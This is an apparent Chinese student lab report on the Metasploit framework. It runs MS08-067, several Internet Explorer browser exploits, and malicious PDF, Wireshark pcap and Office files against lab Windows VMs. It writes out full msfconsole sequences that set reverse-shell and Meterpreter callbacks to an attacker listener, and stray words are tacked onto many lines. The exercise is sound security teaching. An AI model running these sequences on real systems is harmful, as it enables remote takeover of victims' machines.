1.模块:
模块是指Metasploit
框架中所使用的一段软件代码组件,查看六种模块源码目录/usr/share/metasploit-framework/modules
共六个模块:html
渗透攻击模块; 辅助模块; 攻击载荷; 空字段模块; 编码模块; 后渗透攻击模块;
2.用户操做界面:web
msfconsole armitage webgui
3.攻击方式shell
主动攻击:直接攻击系统开启的漏洞服务,获取系统控制权 攻击浏览器,获取系统控制权 攻击客户端应用,获取系统控制权 本地提权
4.使用命令windows
search name:用指定关键字搜索能够利用的漏洞模块 use exploit name:使用漏洞 show options:显示配置选项 set option name option:设置选项 show payloads:回链攻击载荷 show targets: 显示目标(os版本) set TARGET target number:设置目标版本 exploit:开始漏洞攻击 sessions -l:列出会话 sessions -i id:选择会话 sessions -k id:结束会话 Ctrl+z:把会话放到后台 Ctrl+c:结束会话 show auxiliary:显示辅助模块 use auxiliary name:使用辅助模块 set option name option:设置选项 exploit:运行模块
任务一:主动攻击实践
任务二:一个针对浏览器的攻击
任务三:一个针对客户端的攻击
任务四:成功应用任何一个辅助模块api
1.MS08_067自动化漏洞
攻击机IP:kali 192.168.64.144
靶机:Win2000 192.168.64.166
输入msfconsole进入控制台,依次输入如下指令:浏览器
use exploit/windows/smb/ms08_067_netapi; show payloads; set payload generic/shell_reverse_tcp ;//回连 set LHOST 192.168.64.144 set LPORT 5206 set RHOST 192.168.64.166 set target 0 exploit
1.针对浏览器的攻击MS11-050
攻击机IP:kali 192.168.64.144
靶机:Win2000 192.168.64.166
输入msfconsole进入控制台,依次输入如下指令:session
use windows/browser/ms11_050_mshtml_cobjectelement; set payload windows/meterpreter/reverse_http set LHOST 192.168.64.144 set LPORT 5206 set RHOST 192.168.64.166 set URIPATH ldc20175206 exploit
攻击失败,靶机没法找到该网页,攻击机出现错误字样。框架
2.针对浏览器的攻击MS10_018
攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.165
输入msfconsole进入控制台,依次输入如下指令:tcp
use windows/browser/ms10_018_ie_behaviors; set payload windows/meterpreter/bind_tcp set LHOST 192.168.64.144 set LPORT 5206 set RHOST 192.168.64.165 set URIPATH 20175206ldc exploit
攻击成功!出现suceesfully字样。工具
3.针对浏览器的攻击MS06-013(惟一)
输入命令serach browser
查看漏洞:
选取漏洞进行攻击
攻击机IP:kali 192.168.64.144
靶机:Win2008 192.168.64.165
输入msfconsole进入控制台,依次输入如下指令:
use windows/browser/ms06_013_createtextrange; set SRVHOST 192.168.64.144 set URIPATH 66666 exploit
攻击成功!发送代码1-100!
攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.136
Adobe:
在msfconsle中输入命令:
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp //tcp反向回连 set LHOST 192.168.64.144 set LPORT 5206 set FILENAME ldc20175206.pdf exploit //攻击
咱们发现建立的PDF文件生成位置:
copy到靶机中并打开:
在攻击机中输入:
use exploit/multi/handler //进入监听模块 set payload windows/meterpreter/reverse_tcp //tcp反向链接 set LHOST 192.168.64.144 //攻击机ip set LPORT 5206 //攻击端口固定 exploit
虽然没有打开pdf,可是已经获得回连显示,输入dir便可成功得到回连!
攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.136
这里在试验了多个漏洞以后,发现仍是针对wireshark的攻击较为方便,由于wireshark以前在XP中已有安装。
wireshark pcap攻击
输入msfconsole进入控制台,依次输入如下指令:
msfconsole //进入控制台 use exploit/windows/fileformat/wireshark_packet_dect.rb set payload windows/meterpreter/reverse_tcp set LHOST 192.168.64.144 set LPORT 5206 set FILENAME ldc20175206.pcap show options exploit
而后back回基础界面,输入下列命令:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.64.144 set LPORT 5206 exploit
在靶机中打开咱们传入的pcap文件,便可获得回显!
虽然打开仍是没有相应,可是咱们经过攻击机的现象已经了解到攻击成功!
再来一个office的攻击:
攻击机IP:kali 192.168.64.144
靶机:WinXP 192.168.64.136
和以前同样输入命令
use windows/fileformat/ms11_006_createsizeddibsection set payload windows/meterpreter/reverse_tcp set LHOST 192.168.64.144 set LPORT 5206 set FILENAME ldc20175206.pcap show options exploit
将生成的doc传到靶机中,开始监控,便可获得现象!如图,成功获得回显!
实验成功!
(1)用本身的话解释什么是exploit,payload,encode。
exploit:攻击模块,是利用靶机的系统漏洞进行攻击的模块。
payload:载荷模块,是传输攻击所用的代码和数据的模块。
encode:编码模块,是用来对攻击代码编译更新的模块。
(2)离实战还缺些什么技术或步骤?
从本次实验中就能够看出来,咱们进行渗透的时候,发现版本都是一些旧的,或者是被淘汰和即将被淘汰的版本(指已经不是主流使用版本),这样实用性就变得很是的弱。并且即使是win XP系统,咱们也须要让系统的防火墙关闭才能进行系统的攻击。而实际攻击状况下,系统须要是最新的版本,防火墙也是最新的,对漏洞的种类更新应该已经齐全。其次,防火墙不是关闭的而是开启着的,咱们的渗透攻击没法跨过防火墙。这么看来,咱们距离实战还有很长的一段路要走,最起码以如今的程度就不要称本身是在搞渗透了,咱们还应该继续深刻研究每一个版本,寻找其漏洞进行分析和处理,以更好的保护咱们的系统,修复漏洞,防止有心人利用这些漏洞作非法的事情,对咱们形成巨大的损失。